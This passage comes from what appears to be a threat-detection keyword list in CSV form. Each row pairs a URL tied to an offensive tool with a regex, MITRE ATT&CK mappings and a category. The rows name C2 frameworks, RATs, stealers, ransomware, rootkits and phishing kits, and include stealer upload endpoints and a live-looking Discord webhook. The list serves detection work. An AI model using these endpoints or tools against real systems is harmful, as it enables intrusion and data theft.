projects","10","","N/A","","","","47772" "*https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/raw/master/tools/ghostip.sh*",".{0,1000}https\:\/\/github\.com\/hackerschoice\/thc\-tips\-tricks\-hacks\-cheat\-sheet\/raw\/master\/tools\/ghostip\.sh.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","1","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","47773" "*https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/raw/master/tools/whatserver.sh*",".{0,1000}https\:\/\/github\.com\/hackerschoice\/thc\-tips\-tricks\-hacks\-cheat\-sheet\/raw\/master\/tools\/whatserver\.sh.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - 
T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","1","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","47774" "*https://github.com/Lolliedieb/lolMiner-releases/releases/download/*",".{0,1000}https\:\/\/github\.com\/Lolliedieb\/lolMiner\-releases\/releases\/download\/.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","1","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","47775" "*https://github.com/m0nad/Diamorphine*",".{0,1000}https\:\/\/github\.com\/m0nad\/Diamorphine.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","47776" "*https://github.com/MadExploits/Privelege-escalation/raw/main/pwnkit*",".{0,1000}https\:\/\/github\.com\/MadExploits\/Privelege\-escalation\/raw\/main\/pwnkit.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","1","N/A","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","47777" "*https://github.com/The-Viper-One*",".{0,1000}https\:\/\/github\.com\/The\-Viper\-One.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","47779" "*https://github.com/threatexpress/red-team-scripts/blob/master/HostEnum.ps1*",".{0,1000}https\:\/\/github\.com\/threatexpress\/red\-team\-scripts\/blob\/master\/HostEnum\.ps1.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","47780" "*https://github.com/trustedsec/specula/wiki/Why-am-I-seeing-this*",".{0,1000}https\:\/\/github\.com\/trustedsec\/specula\/wiki\/Why\-am\-I\-seeing\-this.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","1","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","47781" "*https://gitlab.com/kalilinux/*",".{0,1000}https\:\/\/gitlab\.com\/kalilinux\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation 
OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","47783" "*https://gitlab.com/kalilinux/packages/asleap*",".{0,1000}https\:\/\/gitlab\.com\/kalilinux\/packages\/asleap.{0,1000}","offensive_tool_keyword","asleap","Exploiting a serious deficiency in proprietary Cisco LEAP networks","T1078 - T1557 - T1040","TA0006 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/joswr1ght/asleap","1","1","#linux","N/A","10","1","88","20","2021-06-21T00:13:17Z","2016-08-30T13:00:21Z","47784" "*https://graph.microsoft.com/v1.0/drive/root:/testfoldera/{file_name}:/createUploadSession*",".{0,1000}https\:\/\/graph\.microsoft\.com\/v1\.0\/drive\/root\:\/testfoldera\/\{file_name\}\:\/createUploadSession.{0,1000}","offensive_tool_keyword","SharpExfil","C# executables to extract information from target environment using OneDrive API.","T1567.002 - T1020 - T1071.001","TA0005 - TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/adm1nPanda/SharpExfil","1","0","#content","N/A","8","1","6","1","2020-07-02T14:48:55Z","2019-07-27T05:28:40Z","47789" "*https://gsocket.io/install.sh*",".{0,1000}https\:\/\/gsocket\.io\/install\.sh.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","47790" "*https://hashcapture.com/*",".{0,1000}https\:\/\/hashcapture\.com\/.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","1","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","47791" "*https://hashcracking.ru*",".{0,1000}https\:\/\/hashcracking\.ru.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47792" "*https://hashes.com*",".{0,1000}https\:\/\/hashes\.com.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47793" "*https://hashtoolkit.com/generate-hash/?text=*",".{0,1000}https\:\/\/hashtoolkit\.com\/generate\-hash\/\?text\=.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","47794" 
"*https://i.imgur.com/RfsCOES.png*",".{0,1000}https\:\/\/i\.imgur\.com\/RfsCOES\.png.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","1","N/A","N/A","10","","N/A","","","","47798" "*https://itm4n.github.io/windows-registry-rpceptmapper-eop/*",".{0,1000}https\:\/\/itm4n\.github\.io\/windows\-registry\-rpceptmapper\-eop\/.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","1","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","47801" "*https://join-zoom-online-meeting*",".{0,1000}https\:\/\/join\-zoom\-online\-meeting.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","47802" "*https://kali.download*",".{0,1000}https\:\/\/kali\.download\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","47805" "*https://lea.kz*",".{0,1000}https\:\/\/lea\.kz.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47806" "*https://localhost:7443/*",".{0,1000}https\:\/\/localhost\:7443\/.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","47808" "*https://mainstream.ngrok.app/?method=UploadFile&filename=*",".{0,1000}https\:\/\/mainstream\.ngrok\.app\/\?method\=UploadFile\&filename\=.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - 
TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","1","N/A","N/A","10","7","N/A","N/A","N/A","N/A","47815" "*https://mastodon.be/@username_fzihfzuhfuoz/109994357971853428*",".{0,1000}https\:\/\/mastodon\.be\/\@username_fzihfzuhfuoz\/109994357971853428.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","47816" "*https://mastodon.be/username_fzihfzuhfuoz/109743339821428173*",".{0,1000}https\:\/\/mastodon\.be\/username_fzihfzuhfuoz\/109743339821428173.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","47817" "*https://md5.navisec.it*",".{0,1000}https\:\/\/md5\.navisec\.it.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47819" "*https://md5decrypt.net*",".{0,1000}https\:\/\/md5decrypt\.net.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47820" 
"*https://media0.giphy.com/media/l0IynvAIYxm8ZGUrm/giphy.gif?cid=ecf05e47qvbyv5iod2z91r9bufnpkvsjn1xm18a63b0g8z9a&ep=v1_gifs_related&rid=giphy.gif&ct=g*",".{0,1000}https\:\/\/media0\.giphy\.com\/media\/l0IynvAIYxm8ZGUrm\/giphy\.gif\?cid\=ecf05e47qvbyv5iod2z91r9bufnpkvsjn1xm18a63b0g8z9a\&ep\=v1_gifs_related\&rid\=giphy\.gif\&ct\=g.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","1","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","47830" "*https://minio.pico.sh*",".{0,1000}https\:\/\/minio\.pico\.sh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","47841" "*https://mp.weixin.qq.com/s/GDPAC_9-Pxfcj_z0_C_ixw*",".{0,1000}https\:\/\/mp\.weixin\.qq\.com\/s\/GDPAC_9\-Pxfcj_z0_C_ixw.{0,1000}","offensive_tool_keyword","AVKiller","forcibly close some anti-virus processes through process injection (taking 360 Security Guard and 360 Anti-Virus as examples)","T1055.011 - T1089","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/1y0n/AVKiller","1","1","N/A","N/A","10","2","127","18","2023-12-26T05:47:55Z","2023-12-19T00:55:23Z","47842" "*https://mrd0x.com/progressive-web-apps-pwa-phishing*",".{0,1000}https\:\/\/mrd0x\.com\/progressive\-web\-apps\-pwa\-phishing.{0,1000}","offensive_tool_keyword","PWA-Phishing","Phishing with Progressive Web Apps and UI manipulation","T1071.003 - T1204.002 - T1608.003 - 
T1071.004","TA0006","N/A","N/A","Phishing","https://github.com/mrd0x/PWA-Phishing","1","1","N/A","N/A","10","3","288","52","2024-06-16T17:47:15Z","2024-06-09T19:47:52Z","47843" "*https://nemesis.*.com/api/*",".{0,1000}https\:\/\/nemesis\..{0,1000}\.com\/api\/.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","47845" "*https://nsocks.net/*",".{0,1000}https\:\/\/nsocks\.net\/.{0,1000}","offensive_tool_keyword","nsocks","proxy service that allows users to route their traffic through SOCKS5 proxie","T1090.002 - T1090 - T1071.001 - T1572","TA0011 - TA0005","N/A","Scattered Spider* - Black Basta","C2","https://github.com/bbepis/Nsocks","1","1","N/A","N/A","9","10","3","0","2020-06-08T17:25:07Z","2020-03-28T09:00:22Z","47849" "*https://nsocks.net/proxy*",".{0,1000}https\:\/\/nsocks\.net\/proxy.{0,1000}","offensive_tool_keyword","nsocks","socks5 proxy provider","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider* - Black Basta","C2","https://nsocks.net","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","47850" "*https://nsocks4pvtcewb2ora3zk47ksx7dvazbxyhzp4myhegpthgkphpi7aad.onion/*",".{0,1000}https\:\/\/nsocks4pvtcewb2ora3zk47ksx7dvazbxyhzp4myhegpthgkphpi7aad\.onion\/.{0,1000}","offensive_tool_keyword","nsocks","socks5 proxy provider","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider* - Black Basta","C2","https://nsocks.net","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","47851" "*https://ntlm.pw*",".{0,1000}https\:\/\/ntlm\.pw.{0,1000}","offensive_tool_keyword","ntlm.pw","Database of NTLM hashes","T1003 - T1555 - T1558","TA0006","N/A","Black Basta","Credential Access","https://ntlm.pw","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","47853" 
"*https://ntlm.pw/*",".{0,1000}https\:\/\/ntlm\.pw\/.{0,1000}","offensive_tool_keyword","NTLMSleuth","verify NTLM hash integrity against the robust database of ntlm.pw.","T1003 - T1555","TA0006","N/A","Black Basta","Credential Access","https://github.com/jmarr73/NTLMSleuth","1","1","N/A","N/A","8","1","8","0","2024-08-28T15:21:10Z","2023-12-12T16:41:35Z","47854" "*https://passwordrecovery.io*",".{0,1000}https\:\/\/passwordrecovery\.io.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47858" "*https://pastebin.com/9JyjcMAH*",".{0,1000}https\:\/\/pastebin\.com\/9JyjcMAH.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","1","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","47859" "*https://pastebin.com/iBeTbXCw*",".{0,1000}https\:\/\/pastebin\.com\/iBeTbXCw.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","1","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","47860" "*https://pastebin.com/raw/34gqdu7k*",".{0,1000}https\:\/\/pastebin\.com\/raw\/34gqdu7k.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 
- T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","1","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","47861" "*https://pastebin.com/raw/88SGrHVh*",".{0,1000}https\:\/\/pastebin\.com\/raw\/88SGrHVh.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","47862" "*https://pastebin.com/raw/9kha6nwh*",".{0,1000}https\:\/\/pastebin\.com\/raw\/9kha6nwh.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","1","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","47863" "*https://pastebin.com/raw/DDTVwwbu*",".{0,1000}https\:\/\/pastebin\.com\/raw\/DDTVwwbu.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 
- T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","1","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","47864" "*https://pastebin.com/raw/fevFJe98*",".{0,1000}https\:\/\/pastebin\.com\/raw\/fevFJe98.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","47865" "*https://pastebin.com/raw/rGCQC1zq*",".{0,1000}https\:\/\/pastebin\.com\/raw\/rGCQC1zq.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","1","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","47866" "*https://phppasswordhash.com/*",".{0,1000}https\:\/\/phppasswordhash\.com\/.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","1","N/A","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","47867" 
"*https://pico.sh/getting-started*",".{0,1000}https\:\/\/pico\.sh\/getting\-started.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","47868" "*https://pico.sh/tuns*",".{0,1000}https\:\/\/pico\.sh\/tuns.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","47869" "*https://privatix-temp-mail-v1.p.rapidapi.com/request/domains/*",".{0,1000}https\:\/\/privatix\-temp\-mail\-v1\.p\.rapidapi\.com\/request\/domains\/.{0,1000}","offensive_tool_keyword","ShellSync","using the API of a disposable email address to use anytime - could be abused by malicious actors","T1071.003","TA0005 - TA0001","N/A","N/A","Defense Evasion","https://github.com/I-Am-Jakoby/ShellSync","1","1","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","47874" "*https://privatix-temp-mail-v1.p.rapidapi.com/request/mail/id/null/*",".{0,1000}https\:\/\/privatix\-temp\-mail\-v1\.p\.rapidapi\.com\/request\/mail\/id\/null\/.{0,1000}","offensive_tool_keyword","ShellSync","using the API of a disposable email address to use anytime - could be abused by malicious actors","T1071.003","TA0005 - TA0001","N/A","N/A","Defense Evasion","https://github.com/I-Am-Jakoby/ShellSync","1","1","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","47876" 
"*https://proxy.duckduckgo.com/iu/?u=https://pdxkmdcepvahysnnxe.pythonanywhere.com/image.jpg?cmd=*",".{0,1000}https\:\/\/proxy\.duckduckgo\.com\/iu\/\?u\=https\:\/\/pdxkmdcepvahysnnxe\.pythonanywhere\.com\/image\.jpg\?cmd\=.{0,1000}","offensive_tool_keyword","DuckDuckC2","A proof-of-concept C2 channel through DuckDuckGo's image proxy service","T1071.001 - T1090.003","TA0011 - TA0042","N/A","N/A","C2","https://github.com/nopcorn/DuckDuckC2","1","1","N/A","N/A","10","10","74","6","2023-11-12T10:24:59Z","2023-09-23T20:00:09Z","47879" "*https://ptb.discord.com/api/webhooks/1226217588959215726/AZaNnD4TIN-9sV-t0rsveiQxcROYaCVziI8BUa6CNPsUxdnW9mdHu7HnuQ55kQPXZ8_5*",".{0,1000}https\:\/\/ptb\.discord\.com\/api\/webhooks\/1226217588959215726\/AZaNnD4TIN\-9sV\-t0rsveiQxcROYaCVziI8BUa6CNPsUxdnW9mdHu7HnuQ55kQPXZ8_5.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","47880" "*https://pyobfuscate.com*'eval': bytes.fromhex(*",".{0,1000}https\:\/\/pyobfuscate\.com.{0,1000}\'eval\'\:\sbytes\.fromhex\(.{0,1000}","offensive_tool_keyword","pyobfuscate","ADVANCED PYTHON OBFUSCATOR","T1027 - T1027.009","TA0005","N/A","N/A","Defense Evasion","https://pyobfuscate.com/pyd","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","47886" "*https://pyobfuscate.com/pyd*",".{0,1000}https\:\/\/pyobfuscate\.com\/pyd.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","1","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","47887" 
"*https://pyobfuscate.com/pyd*",".{0,1000}https\:\/\/pyobfuscate\.com\/pyd.{0,1000}","offensive_tool_keyword","pyobfuscate","ADVANCED PYTHON OBFUSCATOR","T1027 - T1027.009","TA0005","N/A","N/A","Defense Evasion","https://pyobfuscate.com/pyd","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A","47888" "*https://ratte.ngrok.app/main/mainer*",".{0,1000}https\:\/\/ratte\.ngrok\.app\/main\/mainer.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","1","N/A","N/A","10","7","N/A","N/A","N/A","N/A","47899" "*https://raw.githubusercontent.com/*/msg_x64.dll*",".{0,1000}https\:\/\/raw\.githubusercontent\.com\/.{0,1000}\/msg_x64\.dll.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense 